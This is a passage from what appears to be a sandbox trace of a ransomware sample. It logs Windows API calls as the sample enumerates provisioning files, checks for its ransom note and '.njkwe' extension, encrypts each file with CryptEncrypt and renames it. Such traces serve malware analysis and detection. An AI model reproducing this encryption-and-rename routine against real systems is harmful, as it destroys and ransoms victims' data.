nNumberOfBytesToWrite=0x2be, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2be, lpOverlapped=0x0) returned 1 [0077.299] GetProcessHeap () returned 0xbe0000 [0077.299] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.299] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.299] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.299] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.299] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.299] CloseHandle (hObject=0x43c) returned 1 [0077.299] GetProcessHeap () returned 0xbe0000 [0077.299] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.299] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 175 [0077.300] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\203__connections_cellular_3 (ireland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\203__Connections_Cellular_3 (Ireland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\203__connections_cellular_3 (ireland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.300] GetProcessHeap () returned 0xbe0000 [0077.300] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.300] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907a5631, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907a5631, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907a5631, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1cc, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="204__C~1.PRO")) returned 1 [0077.300] lstrcmpiW (lpString1="204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0077.300] lstrcmpiW (lpString1="204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0077.300] lstrcmpiW (lpString1="204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0077.300] lstrcmpiW (lpString1="204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0077.300] lstrcmpiW (lpString1="204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0077.300] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0077.300] StrStrIW (lpFirst="204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0077.300] lstrcmpW (lpString1="204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.300] lstrcmpW (lpString1="204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0077.300] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\204__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.300] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\204__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.301] GetTickCount () returned 0x1153a94 [0077.301] GetTickCount () returned 0x1153a94 [0077.301] GetTickCount () returned 0x1153a94 [0077.301] GetTickCount () returned 0x1153a94 [0077.301] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.301] GetProcessHeap () returned 0xbe0000 [0077.301] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.301] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1cc, lpOverlapped=0x0) returned 1 [0077.302] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.302] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1cc, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1cc, lpOverlapped=0x0) returned 1 [0077.302] GetProcessHeap () returned 0xbe0000 [0077.302] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.302] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.302] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.305] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.305] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.305] CloseHandle (hObject=0x43c) returned 1 [0077.305] GetProcessHeap () returned 0xbe0000 [0077.305] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.305] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0077.305] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\204__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\204__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\204__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.306] GetProcessHeap () returned 0xbe0000 [0077.306] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.306] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907a5631, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907a5631, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907a5631, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x283, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="205__C~1.PRO")) returned 1 [0077.306] lstrcmpiW (lpString1="205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.306] lstrcmpiW (lpString1="205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.306] lstrcmpiW (lpString1="205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.306] lstrcmpiW (lpString1="205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.306] lstrcmpiW (lpString1="205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.306] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml") returned 156 [0077.306] StrStrIW (lpFirst="205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.306] lstrcmpW (lpString1="205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.306] lstrcmpW (lpString1="205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.306] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\205__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.306] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\205__connections_cellular_o2 (ireland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.306] GetTickCount () returned 0x1153a94 [0077.306] GetTickCount () returned 0x1153a94 [0077.306] GetTickCount () returned 0x1153a94 [0077.306] GetTickCount () returned 0x1153a94 [0077.306] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.307] GetProcessHeap () returned 0xbe0000 [0077.307] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.307] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0077.308] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.308] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0077.308] GetProcessHeap () returned 0xbe0000 [0077.308] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.308] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.308] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.308] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.308] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.308] CloseHandle (hObject=0x43c) returned 1 [0077.309] GetProcessHeap () returned 0xbe0000 [0077.309] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.309] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 176 [0077.309] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\205__connections_cellular_o2 (ireland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\205__Connections_Cellular_O2 (Ireland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\205__connections_cellular_o2 (ireland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.309] GetProcessHeap () returned 0xbe0000 [0077.309] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.309] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907a5631, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907a5631, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907a5631, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x35f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml", cAlternateFileName="206__C~1.PRO")) returned 1 [0077.309] lstrcmpiW (lpString1="206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.309] lstrcmpiW (lpString1="206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.309] lstrcmpiW (lpString1="206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.309] lstrcmpiW (lpString1="206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.309] lstrcmpiW (lpString1="206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.310] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml") returned 170 [0077.310] StrStrIW (lpFirst="206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.310] lstrcmpW (lpString1="206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.310] lstrcmpW (lpString1="206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.310] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\206__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.310] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\206__connections_cellular_vodafone ireland (ireland)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.311] GetTickCount () returned 0x1153a94 [0077.311] GetTickCount () returned 0x1153a94 [0077.311] GetTickCount () returned 0x1153a94 [0077.311] GetTickCount () returned 0x1153aa4 [0077.312] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.312] GetProcessHeap () returned 0xbe0000 [0077.312] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.312] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x35f, lpOverlapped=0x0) returned 1 [0077.313] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffca1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.313] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x35f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x35f, lpOverlapped=0x0) returned 1 [0077.313] GetProcessHeap () returned 0xbe0000 [0077.313] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.313] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.313] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.313] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.313] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.313] CloseHandle (hObject=0x43c) returned 1 [0077.314] GetProcessHeap () returned 0xbe0000 [0077.314] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.314] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 190 [0077.314] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\206__connections_cellular_vodafone ireland (ireland)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\206__Connections_Cellular_Vodafone Ireland (Ireland)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\206__connections_cellular_vodafone ireland (ireland)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.314] GetProcessHeap () returned 0xbe0000 [0077.314] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.314] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x907a5631, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x907a5631, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x907a5631, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="207__C~1.PRO")) returned 1 [0077.314] lstrcmpiW (lpString1="207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0077.314] lstrcmpiW (lpString1="207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0077.314] lstrcmpiW (lpString1="207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0077.314] lstrcmpiW (lpString1="207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0077.315] lstrcmpiW (lpString1="207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0077.315] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0077.315] StrStrIW (lpFirst="207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0077.315] lstrcmpW (lpString1="207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.315] lstrcmpW (lpString1="207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0077.315] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\207__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.315] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\207__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\207__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.315] GetTickCount () returned 